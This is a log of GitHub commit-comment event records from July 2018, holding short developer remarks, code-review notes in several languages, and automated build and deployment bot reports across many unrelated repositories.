{"id":"7991838232","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29771171,"position":1,"line":1,"path":".settings/org.eclipse.core.resources.prefs","commit_id":"a248497b722c154eb0415c5cc438fcc929f5e6eb","created_at":"2018-07-19T21:55:43Z","updated_at":"2018-07-19T21:55:43Z","author_association":"CONTRIBUTOR","body":"Jump is to be pronounced like yump but it uses the ipa\r\n"}},"created_at":"2018-07-19T21:55:43Z"}
{"id":"7991838614","type":"CommitCommentEvent","actor":{"login":"jaresan"},"repo":{"name":"blackuy/react-native-twilio-video-webrtc"},"payload":{"comment":{"id":29771172,"position":null,"line":null,"path":null,"commit_id":"1e27e37c58d73c66dcdc4ec32ecab10ad7cf0187","created_at":"2018-07-19T21:55:49Z","updated_at":"2018-07-19T21:55:49Z","author_association":"NONE","body":"I got the same error and have been scratching my head for a while now. Did you push a change that broke the build for people including your pod without providing info first?"}},"created_at":"2018-07-19T21:55:49Z"}
{"id":"7991841628","type":"CommitCommentEvent","actor":{"login":"caco3"},"repo":{"name":"Ryan-Myers/canon-selphy-print"},"payload":{"comment":{"id":29771180,"position":null,"line":null,"path":null,"commit_id":"c469bc2b4a2f0001a290cb4ff7cb9cd832244685","created_at":"2018-07-19T21:56:36Z","updated_at":"2018-07-19T21:56:36Z","author_association":"NONE","body":"I packed a deb package using checkinstall. If somebody wants to try it out, its available here: https://www.ruinelli.ch/download/software/gimp-print_5.3.0-pre2-25e28154-1_amd64.deb\r\n**Please note that I got it working only once on my Ubuntu 17.10 system. Afterwards the system run some updates and now i am no longer able to print borderless!** :-1: "}},"created_at":"2018-07-19T21:56:36Z"}
{"id":"7991845134","type":"CommitCommentEvent","actor":{"login":"thraizz"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29771194,"position":null,"line":null,"path":null,"commit_id":"c290190400004f8afbc8cff350e0667a39c4f17f","created_at":"2018-07-19T21:57:31Z","updated_at":"2018-07-19T21:57:31Z","author_association":"CONTRIBUTOR","body":"The webui build depends on this file and fails now, as `dh_installdocs` tries to copy the webui's changelog. The fix is already contained in #97."}},"created_at":"2018-07-19T21:57:31Z"}
{"id":"7991856607","type":"CommitCommentEvent","actor":{"login":"ldesrosi"},"repo":{"name":"HyperledgerHandsOn/trade-finance-logistics"},"payload":{"comment":{"id":29771228,"position":null,"line":null,"path":null,"commit_id":"284ea59fb74774d1e257be943747784c7421f102","created_at":"2018-07-19T22:00:22Z","updated_at":"2018-07-19T22:00:22Z","author_association":"COLLABORATOR","body":"If we revert this change then the code will start failing in chapter 4 since most of the exercises are done using the dev-mode network which does not have any of the right MSP, so access will be denied."}},"created_at":"2018-07-19T22:00:22Z"}
{"id":"7991856675","type":"CommitCommentEvent","actor":{"login":"esummers1"},"repo":{"name":"Danjb1/3d-platformer"},"payload":{"comment":{"id":29771229,"position":null,"line":null,"path":null,"commit_id":"a6e1287459a6bb3a408e8ab8481bdfc24f15e8a1","created_at":"2018-07-19T22:00:22Z","updated_at":"2018-07-19T22:00:22Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-19T22:00:22Z"}
{"id":"7991860364","type":"CommitCommentEvent","actor":{"login":"jaresan"},"repo":{"name":"blackuy/react-native-twilio-video-webrtc"},"payload":{"comment":{"id":29771240,"position":null,"line":null,"path":null,"commit_id":"1e27e37c58d73c66dcdc4ec32ecab10ad7cf0187","created_at":"2018-07-19T22:01:09Z","updated_at":"2018-07-19T22:01:09Z","author_association":"NONE","body":"I got the same error and have been scratching my head for a while now, didn't know it's because of a change in the repo."}},"created_at":"2018-07-19T22:01:09Z"}
{"id":"7991861626","type":"CommitCommentEvent","actor":{"login":"westpoint"},"repo":{"name":"westpoint/sturdy-fortnight"},"payload":{"comment":{"id":29771241,"position":19,"line":19,"path":".gitignore","commit_id":"03d26d532597e99870778f07d228d4eaa7c3f3c9","created_at":"2018-07-19T22:01:23Z","updated_at":"2018-07-19T22:01:23Z","author_association":"OWNER","body":"fh\r\n"}},"created_at":"2018-07-19T22:01:23Z"}
{"id":"7991865776","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"deft1991/otus"},"payload":{"comment":{"id":29771251,"position":23,"line":27,"path":"homework6/src/main/java/ru/deft/homework6/repository/BookDaoJdbc.java","commit_id":"0c0e1b0377b337f7e70c5953d1e38ee6e8925421","created_at":"2018-07-19T22:02:26Z","updated_at":"2018-07-19T22:02:26Z","author_association":"NONE","body":"Вооот!!! И JdbcOperations лучше совсем убрать)"}},"created_at":"2018-07-19T22:02:26Z"}
{"id":"7991866266","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"deft1991/otus"},"payload":{"comment":{"id":29771253,"position":44,"line":41,"path":"homework6/src/main/java/ru/deft/homework6/repository/BookDaoJdbc.java","commit_id":"0c0e1b0377b337f7e70c5953d1e38ee6e8925421","created_at":"2018-07-19T22:02:35Z","updated_at":"2018-07-19T22:02:35Z","author_association":"NONE","body":"Уррра)"}},"created_at":"2018-07-19T22:02:35Z"}
{"id":"7991867315","type":"CommitCommentEvent","actor":{"login":"heroldn"},"repo":{"name":"ARCCSS-extremes/climpact2"},"payload":{"comment":{"id":29771257,"position":null,"line":null,"path":null,"commit_id":"4bf268708d3fa37ef239d4fa4e2fdff7b32d2028","created_at":"2018-07-19T22:02:52Z","updated_at":"2018-07-19T22:02:52Z","author_association":"CONTRIBUTOR","body":"This version change reflects the removal of several dev.copy() commands from the GUI that were causing issues in windows 10 with recent versions of R."}},"created_at":"2018-07-19T22:02:52Z"}
{"id":"7991869963","type":"CommitCommentEvent","actor":{"login":"jrgm"},"repo":{"name":"mozilla/fxa-email-service"},"payload":{"comment":{"id":29771268,"position":null,"line":null,"path":null,"commit_id":"b69cfb5365629bbd2923e2b6a99f07186ad071ce","created_at":"2018-07-19T22:03:34Z","updated_at":"2018-07-19T22:03:34Z","author_association":"MEMBER","body":"I can't get this to bind to another port in stage.\r\n\r\nNODE_ENV and ROCKET_ENV are both 'production' in the environment, and PORT is set to 9000 in the environment. But /app/bin/fxa_email_send is bound to 8001 and logging output shows `\"port\\\":8001`.\r\n\r\n8001 is the auth-db port in prod/stage, so fxa_email_send is getting those requests at the moment."}},"created_at":"2018-07-19T22:03:34Z"}
{"id":"7991877529","type":"CommitCommentEvent","actor":{"login":"Grinch"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":29771286,"position":83,"line":216,"path":"src/main/java/com/almuradev/almura/feature/death/client/gui/PlayerDiedGUI.java","commit_id":"1c90913f7979dc9d64006615f6b8400847624f9f","created_at":"2018-07-19T22:05:36Z","updated_at":"2018-07-19T22:05:36Z","author_association":"MEMBER","body":"Has too many spaces, \"scare\" != \"scar\""}},"created_at":"2018-07-19T22:05:36Z"}
{"id":"7991883827","type":"CommitCommentEvent","actor":{"login":"haaspors"},"repo":{"name":"espressif/crosstool-NG"},"payload":{"comment":{"id":29771308,"position":4,"line":4,"path":"local-patches/newlib/2.2.0/0022-xtensa-enable-pthreads-support.patch","commit_id":"715a1fd47f6a4e6f2706ef24f9ea35e97614faff","created_at":"2018-07-19T22:07:18Z","updated_at":"2018-07-19T22:07:18Z","author_association":"NONE","body":"I'm having a hard time understanding why pthreads support should be enabled for the toolchain libc. Especially like it is enabled here.\r\nCan't find this patch in https://github.com/espressif/newlib-esp32 either."}},"created_at":"2018-07-19T22:07:18Z"}
{"id":"7991884454","type":"CommitCommentEvent","actor":{"login":"DylanPiercey"},"repo":{"name":"lasso-js/lasso-marko"},"payload":{"comment":{"id":29771309,"position":null,"line":null,"path":null,"commit_id":"1204438c443fa9f649ea515224f6ab0e788afd4f","created_at":"2018-07-19T22:07:29Z","updated_at":"2018-07-19T22:07:29Z","author_association":"CONTRIBUTOR","body":"Note: the two assertions were removed because the template names are actually included in the main bundle as `template.marko.init.js` and `template.marko.register.js` which is expected. We are still testing on the next line for both tests that the re-rendering logic didn't sneak in."}},"created_at":"2018-07-19T22:07:29Z"}
{"id":"7991887705","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam-orchestrator"},"payload":{"comment":{"id":29771319,"position":null,"line":null,"path":null,"commit_id":"c36fc2510718a7f8c5b4cc3a631871eced5af93c","created_at":"2018-07-19T22:08:20Z","updated_at":"2018-07-19T22:08:20Z","author_association":"OWNER","body":"As per #5 "}},"created_at":"2018-07-19T22:08:20Z"}
{"id":"7991888577","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam-app-scanner"},"payload":{"comment":{"id":29771321,"position":null,"line":null,"path":null,"commit_id":"0dc50651400e7a9d437fa3a2606252dd3149f94f","created_at":"2018-07-19T22:08:34Z","updated_at":"2018-07-19T22:08:34Z","author_association":"OWNER","body":"As per https://github.com/binarymist/purpleteam-orchestrator/issues/5"}},"created_at":"2018-07-19T22:08:34Z"}
{"id":"7991889301","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29771325,"position":null,"line":null,"path":null,"commit_id":"61b41c09a814069672e2af161dff771745ccc443","created_at":"2018-07-19T22:08:45Z","updated_at":"2018-07-19T22:08:45Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/61b41c09a814069672e2af161dff771745ccc443/index.html"}},"created_at":"2018-07-19T22:08:45Z"}
{"id":"7991889426","type":"CommitCommentEvent","actor":{"login":"slycoder"},"repo":{"name":"blackuy/react-native-twilio-video-webrtc"},"payload":{"comment":{"id":29771328,"position":null,"line":null,"path":null,"commit_id":"1e27e37c58d73c66dcdc4ec32ecab10ad7cf0187","created_at":"2018-07-19T22:08:48Z","updated_at":"2018-07-19T22:08:48Z","author_association":"COLLABORATOR","body":"I apologize.  There's a PR out to address this #115 ; please let me know if you have comments on that."}},"created_at":"2018-07-19T22:08:48Z"}
{"id":"7991893349","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29771344,"position":null,"line":null,"path":null,"commit_id":"0afa50c0e9e70b51c8961e169f02d6aed759837f","created_at":"2018-07-19T22:09:51Z","updated_at":"2018-07-19T22:09:51Z","author_association":"COLLABORATOR","body":"I was trying to change the indentation of `crop_yield_f2p.py`. I just pushed a similar change to `genCode.py` (28ec5a525a18c547690c5b6f55f7b49ff1c5e0bd)"}},"created_at":"2018-07-19T22:09:51Z"}
{"id":"7991894303","type":"CommitCommentEvent","actor":{"login":"KawaSwitch"},"repo":{"name":"KawaSwitch/GM2"},"payload":{"comment":{"id":29771347,"position":null,"line":null,"path":null,"commit_id":"85ba8bcf25745288659118688f71065fd9c107bf","created_at":"2018-07-19T22:10:06Z","updated_at":"2018-07-19T22:10:06Z","author_association":"OWNER","body":"コミットメッセージがおかしいが単体テストを作り直す機会があればの話"}},"created_at":"2018-07-19T22:10:06Z"}
{"id":"7991900432","type":"CommitCommentEvent","actor":{"login":"ChrisRackauckas"},"repo":{"name":"JuliaDiffEq/OrdinaryDiffEq.jl"},"payload":{"comment":{"id":29771368,"position":9,"line":135,"path":"src/rkc_utils.jl","commit_id":"25420e703c777c3b62e88117a769860aa842d8cf","created_at":"2018-07-19T22:11:46Z","updated_at":"2018-07-19T22:11:46Z","author_association":"MEMBER","body":"it's `ms[mdeg]`? Or how exactly is the `i` calculated there? That tricky looking at the code: `i` is the first index of the `ms` such that `ms[i] > mdeg`?"}},"created_at":"2018-07-19T22:11:46Z"}
{"id":"7991900683","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29771369,"position":null,"line":null,"path":null,"commit_id":"0a03becc60423c02a7e155807379fa0109778b95","created_at":"2018-07-19T22:11:51Z","updated_at":"2018-07-19T22:11:51Z","author_association":"NONE","body":"@locutus2 yeah, one of them was even somewhat inspired by my whining of stockfish poorly understanding pawnstorms when they block enemy king position... And it was removed by tests of @protonspring ;)\r\nCongrats!"}},"created_at":"2018-07-19T22:11:51Z"}
{"id":"7991901073","type":"CommitCommentEvent","actor":{"login":"jronnberg"},"repo":{"name":"jronnberg/cgm-remote-monitor"},"payload":{"comment":{"id":29771370,"position":null,"line":null,"path":null,"commit_id":"69ab857f522e0c65f0524e28571fc39f95684d4c","created_at":"2018-07-19T22:11:57Z","updated_at":"2018-07-19T22:11:57Z","author_association":"OWNER","body":"Pull latest"}},"created_at":"2018-07-19T22:11:57Z"}
{"id":"7991902848","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dguzek/Simply-Love-SM5"},"payload":{"comment":{"id":29771375,"position":null,"line":null,"path":null,"commit_id":"eabe0321a72c9b6804ecfdc4c43b39144543ea41","created_at":"2018-07-19T22:12:25Z","updated_at":"2018-07-19T22:12:25Z","author_association":"OWNER","body":"I'm sorry, @andrewipark.  😭"}},"created_at":"2018-07-19T22:12:25Z"}
{"id":"7991904057","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771380,"position":1,"line":1,"path":"spring-shell.log","commit_id":"41665d5015c74f249516a558ec3a75071284be40","created_at":"2018-07-19T22:12:47Z","updated_at":"2018-07-19T22:12:47Z","author_association":"NONE","body":"Лог в .gitignore ) Нечего ему здесь делать."}},"created_at":"2018-07-19T22:12:47Z"}
{"id":"7991909404","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29771396,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-19T22:14:18Z","updated_at":"2018-07-19T22:14:18Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2965 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 17 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 626\n * Failed: 17\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.43%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T22:14:18Z"}
{"id":"7991916976","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771415,"position":26,"line":26,"path":"src/main/java/springframework/library/dao/JDBCImpl/AuthorDAOImpl.java","commit_id":"41665d5015c74f249516a558ec3a75071284be40","created_at":"2018-07-19T22:16:26Z","updated_at":"2018-07-19T22:16:26Z","author_association":"NONE","body":"`Collections.singletonMap(\"id\", id)`, да и лучше тип переменной объявлять интерфейсом - Map, а не HashMap. Выбор коллекции должен оставаться только при создании."}},"created_at":"2018-07-19T22:16:26Z"}
{"id":"7991918022","type":"CommitCommentEvent","actor":{"login":"liyinan926"},"repo":{"name":"GoogleCloudPlatform/spark-on-k8s-operator"},"payload":{"comment":{"id":29771416,"position":null,"line":null,"path":null,"commit_id":"7e878578ad722b474a59cc66e9ea867beef44da1","created_at":"2018-07-19T22:16:43Z","updated_at":"2018-07-19T22:16:43Z","author_association":"MEMBER","body":"Hey @barney-s looks like you pushed to the repo directly. Please make sure always create a PR for any change you want to make. Thanks!"}},"created_at":"2018-07-19T22:16:43Z"}
{"id":"7991918397","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771417,"position":46,"line":46,"path":"src/main/java/springframework/library/dao/JDBCImpl/AuthorDAOImpl.java","commit_id":"41665d5015c74f249516a558ec3a75071284be40","created_at":"2018-07-19T22:16:50Z","updated_at":"2018-07-19T22:16:50Z","author_association":"NONE","body":"`Collections.emptyMap()`"}},"created_at":"2018-07-19T22:16:50Z"}
{"id":"7991919873","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29771421,"position":null,"line":null,"path":null,"commit_id":"1d08b721fae30b8a1824b6d51d9712ffbabf56a1","created_at":"2018-07-19T22:17:15Z","updated_at":"2018-07-19T22:17:15Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-821](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-821).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-821-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T22:17:15Z"}
{"id":"7991921101","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29771425,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-19T22:17:36Z","updated_at":"2018-07-19T22:17:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-19T22:17:36Z"}
{"id":"7991923253","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29771428,"position":null,"line":null,"path":null,"commit_id":"f93f0c10cbc6294d2f194a13e19467924b709bbc","created_at":"2018-07-19T22:18:12Z","updated_at":"2018-07-19T22:18:12Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/f93f0c10cbc6294d2f194a13e19467924b709bbc/index.html"}},"created_at":"2018-07-19T22:18:12Z"}
{"id":"7991923943","type":"CommitCommentEvent","actor":{"login":"amirsojoodi"},"repo":{"name":"amirsojoodi/DesignPatterns"},"payload":{"comment":{"id":29771430,"position":null,"line":null,"path":null,"commit_id":"a4e3978a065c3c1d3e58039913755da2d5ed4392","created_at":"2018-07-19T22:18:21Z","updated_at":"2018-07-19T22:18:21Z","author_association":"OWNER","body":"Thanks @alifarazz :)"}},"created_at":"2018-07-19T22:18:21Z"}
{"id":"7991925987","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29771441,"position":null,"line":null,"path":null,"commit_id":"3fada1c26e2657bc49403dd37b4fb5857730c1c8","created_at":"2018-07-19T22:18:56Z","updated_at":"2018-07-19T22:18:56Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-822](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-822).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-822-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T22:18:56Z"}
{"id":"7991929771","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29771453,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-19T22:20:02Z","updated_at":"2018-07-19T22:20:02Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T22:20:02Z"}
{"id":"7991932429","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29771456,"position":null,"line":null,"path":null,"commit_id":"40810fdd85263ad34b53942a70a9baeea0b6a7f2","created_at":"2018-07-19T22:20:48Z","updated_at":"2018-07-19T22:20:48Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [1913clamav](https://1913clamav-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/clamav](https://1913clamav-static-docs.pantheonsite.io/docs/clamav)\n"}},"created_at":"2018-07-19T22:20:48Z"}
{"id":"7991938238","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771467,"position":37,"line":37,"path":"src/main/java/springframework/library/dao/JDBCImpl/BookDAOImpl.java","commit_id":"41665d5015c74f249516a558ec3a75071284be40","created_at":"2018-07-19T22:22:29Z","updated_at":"2018-07-19T22:22:29Z","author_association":"NONE","body":"RowMapper можно написать лямбдой и сихранитьв поле. Сэкономите создание объекта при каждом вызове."}},"created_at":"2018-07-19T22:22:29Z"}
{"id":"7991939715","type":"CommitCommentEvent","actor":{"login":"xiaohui-zhang"},"repo":{"name":"kaldi-asr/kaldi"},"payload":{"comment":{"id":29771471,"position":88,"line":88,"path":"egs/wsj/s5/utils/lang/limit_arpa_unk_history.py","commit_id":"be96725a76c80d22af3ed022f26fdc61c564a436","created_at":"2018-07-19T22:22:53Z","updated_at":"2018-07-19T22:22:53Z","author_association":"CONTRIBUTOR","body":"Hello @olix20, I tested this script and it gives wrong headers (# ngrams). The reason is that here you are not aware that the last field could be the backoff prob. So you can't get correct \"ngram\" in this way. You can easily get it as you did in line 75. "}},"created_at":"2018-07-19T22:22:53Z"}
{"id":"7991941916","type":"CommitCommentEvent","actor":{"login":"lslangley"},"repo":{"name":"firefox0102/waterwatch"},"payload":{"comment":{"id":29771479,"position":null,"line":null,"path":null,"commit_id":"acb24163934ac398bd9ad8acce44a2a1f6fe4296","created_at":"2018-07-19T22:23:33Z","updated_at":"2018-07-19T22:23:33Z","author_association":"COLLABORATOR","body":"ok."}},"created_at":"2018-07-19T22:23:33Z"}
{"id":"7991969990","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771555,"position":9,"line":9,"path":"src/main/java/springframework/library/domain/Book.java","commit_id":"41665d5015c74f249516a558ec3a75071284be40","created_at":"2018-07-19T22:31:29Z","updated_at":"2018-07-19T22:31:29Z","author_association":"NONE","body":"Круто, конечно было бы, если бы жанров и авторов было много) Коллекция т.е."}},"created_at":"2018-07-19T22:31:29Z"}
{"id":"7991970590","type":"CommitCommentEvent","actor":{"login":"joerez"},"repo":{"name":"intljusticemission/react-big-calendar"},"payload":{"comment":{"id":29771558,"position":null,"line":null,"path":null,"commit_id":"d1dfa3eb87edd411ef000950615210959f9948b1","created_at":"2018-07-19T22:31:42Z","updated_at":"2018-07-19T22:31:42Z","author_association":"NONE","body":"Awesome!"}},"created_at":"2018-07-19T22:31:42Z"}
{"id":"7991977565","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29771567,"position":null,"line":null,"path":null,"commit_id":"9f673e3084e78f8b0967b98f7f88c502c1c859cf","created_at":"2018-07-19T22:33:50Z","updated_at":"2018-07-19T22:33:50Z","author_association":"NONE","body":"Should ``attackedBy3[Us] |= attackedBy2[Us] & b;`` come before ``attackedBy2[Us] |= attackedBy[Us][ALL_PIECES] & b;`` ?"}},"created_at":"2018-07-19T22:33:50Z"}
{"id":"7991983793","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771578,"position":27,"line":42,"path":"src/main/java/springframework/library/dao/JDBCImpl/GenreDAOImpl.java","commit_id":"da5ddb093660153c6a69f962393d360da69cf01a","created_at":"2018-07-19T22:35:39Z","updated_at":"2018-07-19T22:35:39Z","author_association":"NONE","body":"Даааа)) Всё так - null не вернётся)"}},"created_at":"2018-07-19T22:35:39Z"}
{"id":"7991984130","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29771579,"position":10,"line":30,"path":"src/checkin/checkInActions.js","commit_id":"27610973f812d74d476bc90b6cc15b3985ca05b8","created_at":"2018-07-19T22:35:46Z","updated_at":"2018-07-19T22:35:46Z","author_association":"MEMBER","body":"Thanks @cioan... I took a quick look and it looks good..."}},"created_at":"2018-07-19T22:35:46Z"}
{"id":"7991986070","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29771585,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-19T22:36:22Z","updated_at":"2018-07-19T22:36:22Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-19T22:36:22Z"}
{"id":"7991987118","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29771590,"position":1,"line":1,"path":".settings/org.eclipse.core.resources.prefs","commit_id":"a248497b722c154eb0415c5cc438fcc929f5e6eb","created_at":"2018-07-19T22:36:45Z","updated_at":"2018-07-19T22:36:45Z","author_association":"CONTRIBUTOR","body":"/ðɪs ɪz greɪt/"}},"created_at":"2018-07-19T22:36:45Z"}
{"id":"7991987372","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771592,"position":27,"line":42,"path":"src/main/java/springframework/library/dao/JDBCImpl/GenreDAOImpl.java","commit_id":"da5ddb093660153c6a69f962393d360da69cf01a","created_at":"2018-07-19T22:36:51Z","updated_at":"2018-07-19T22:36:51Z","author_association":"NONE","body":"А Optional пригодился бы)"}},"created_at":"2018-07-19T22:36:51Z"}
{"id":"7991989000","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771595,"position":32,"line":33,"path":"src/main/java/springframework/library/dao/JDBCImpl/BookDAOImpl.java","commit_id":"6231e3b8af09694929ecbcd1e9ec65698e5e1613","created_at":"2018-07-19T22:37:19Z","updated_at":"2018-07-19T22:37:19Z","author_association":"NONE","body":"Урррааа!! Join-ы)"}},"created_at":"2018-07-19T22:37:19Z"}
{"id":"7991989344","type":"CommitCommentEvent","actor":{"login":"roktas"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29771596,"position":null,"line":null,"path":null,"commit_id":"8b73e5e637016f1ba6f0a788078280e7eab862bd","created_at":"2018-07-19T22:37:25Z","updated_at":"2018-07-19T22:37:25Z","author_association":"MEMBER","body":"@sinansahin katkın için sağol.  küçük bir bilgilendirme: PR çıkıldığında en az iki kişi tarafından review **daima** yapılacak.  çekinmeden PR aç, review peşinden gelecektir."}},"created_at":"2018-07-19T22:37:25Z"}
